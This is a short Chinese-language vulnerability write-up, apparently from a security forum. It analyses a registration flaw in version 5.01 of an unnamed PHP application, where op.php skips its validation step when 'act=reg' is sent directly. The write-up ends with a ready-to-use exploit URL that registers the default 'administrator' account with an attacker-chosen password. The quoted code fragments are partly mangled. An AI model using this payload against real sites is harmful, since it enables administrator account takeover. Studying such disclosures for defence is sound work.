原作者:心灵
漏洞发现在最新版本:5.01,旧版本没源码,不知是否存在。
还是那句话,看代码……
| 
 看文件:op.php: <?php   | 
这里简单得很,看下:“common.inc.php”。
| 
 主要代码: $prev=$_SERVER['HTTP_REFERER'];   | 
这里就是:“op.php?op=register”,载入的,看“op.php”那文件就知,简单得很……,还是那句,看代码。
| 
 以下是引用片段: <?php  if ($act=="check") {     //主要问题在这里...上面common.inc.php说了act是_GET的 如果act不等于check呢?那就不用检测了..............  if ($act=="reg") {  //悲剧了....他真以为所有人都按照他脚本的路去走。。。   | 
| 
 EXP: op.php?op=register&act=reg&uname=administrator&unick=admin&mail=xinling@t00ls.net&pass1=admin&pass2=admin “administrator”是默认管理员账号,当然可以修改其他。  |